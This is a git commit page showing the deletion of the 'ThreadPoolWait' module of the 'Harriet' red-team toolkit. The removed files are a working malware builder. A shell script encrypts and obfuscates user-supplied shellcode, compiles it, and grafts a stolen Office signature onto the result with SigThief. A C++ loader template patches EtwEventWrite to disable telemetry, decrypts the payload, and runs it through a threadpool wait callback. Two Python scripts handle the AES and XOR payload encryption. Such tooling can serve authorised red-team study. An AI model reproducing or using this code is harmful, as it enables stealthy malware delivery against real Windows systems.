
Delete Harriet/Harriet/ThreadPoolWait directory

assume-breach 2 лет назад
Родитель
Сommit
693c36f450

+ 0 - 26
Harriet/Harriet/ThreadPoolWait/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 65
Harriet/Harriet/ThreadPoolWait/Resources/template.cpp


BIN
Harriet/Harriet/ThreadPoolWait/Resources/test.exe


+ 0 - 32
Harriet/Harriet/ThreadPoolWait/Resources/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "NhiLqsjiZXHLmVt"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)

+ 0 - 109
Harriet/Harriet/ThreadPoolWait/TPW.sh

@@ -1,109 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
- _____ _                        _______           _ _    _       _ _   
-|_   _| |                      | | ___ \         | | |  | |     (_) |  
-  | | | |__  _ __ ___  __ _  __| | |_/ /__   ___ | | |  | | __ _ _| |_ 
-  | | | '_ \| '__/ _ \/ _` |/ _` |  __/ _ \ / _ \| | |/\| |/ _` | | __|
-  | | | | | | | |  __/ (_| | (_| | | | (_) | (_) | \  /\  / (_| | | |_ 
-  \_/ |_| |_|_|  \___|\__,_|\__,_\_|  \___/ \___/|_|\/  \/ \__,_|_|\__|
-                                                                       
-EOF
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp Harriet/ThreadPoolWait/xor.py Harriet/ThreadPoolWait/Resources/xor.py
-cp Harriet/ThreadPoolWait/template.cpp Harriet/ThreadPoolWait/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 Harriet/ThreadPoolWait/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/ThreadPoolWait/Resources/template.cpp
-sleep 2
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#VIRTUALALLOC VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#XOR FUNCTION VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#XOR KEY VALUE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
-XOR_KEY=$(cat shell.txt)
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/ThreadPoolWait/Resources/template.cpp
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/ThreadPoolWait/Resources/xor.py
-
-#XOR KEY VARIABLE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
-XOR_VARIABLE=$(cat shell.txt)
-sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/ThreadPoolWait/Resources/template.cpp
-rm shell.txt
-
-#VIRTUALALLOC - XOR String
-echo VirtualAlloc > virt.txt
-python3 Harriet/ThreadPoolWait/Resources/xor.py virt.txt > virtalloc.txt
-virt=$(cat virtalloc.txt)
-virt2="${virt::-8}" 
-sed -i "s/VIRALO/$virt2/g" Harriet/ThreadPoolWait/Resources/template.cpp 
-rm virt*
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE Harriet/ThreadPoolWait/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-

+ 0 - 98
Harriet/Harriet/ThreadPoolWait/template.cpp

@@ -1,98 +0,0 @@
-#include <windows.h>
-#include <threadpoolapiset.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
-
-char XOR_VARIABLE []= "XOR_KEY";
-
-unsigned char Random9 []= VIRALO}; 
-
-
-int Random1(char * Random2, unsigned int Random2_len, char * Random3, size_t Random3len) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)Random3, (DWORD)Random3len, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-         
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, Random2, &Random2_len)){
-                return -1;
-        }
-         
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
-        int r;
-        r = 0;
-        for (int i = 0; i < tada_len; i++) {
-                if (r == XOR_VARIABLE_len - 1) r = 0;
-
-                tada[i] = tada[i] ^ XOR_VARIABLE[r];
-                r++;
-        }
-}
-
-
-int main() { 
-        BOOL rv;
-        HANDLE th;
-    DWORD oldprotect = 0;
-        
-        char Random3 []=KEYVALUE 
-        unsigned char Random2[]=PAYVAL 
-
-        unsigned int Random2_len = sizeof(Random2);
-	
-	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
-        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
-
-        #ifdef _WIN64
-        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
-        #else
-        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
-        #endif  
-
-        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
-
-        FreeConsole();
-        Random1((char *) Random2, Random2_len, Random3, sizeof(Random3));
-        
-        HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
-        
-        RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
-	Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);	
-        
-        LPVOID Random2Address = Virt_Alloc(NULL, sizeof(Random2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-        RtlMoveMemory(Random2Address, Random2, sizeof(Random2));
-
-        PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)Random2Address, NULL, NULL);
-        SetThreadpoolWait(threadPoolWait, event, NULL);
-        WaitForSingleObject(event, INFINITE);
-        
-        return 0;
-}
-

+ 0 - 32
Harriet/Harriet/ThreadPoolWait/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "XOR_KEY"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)
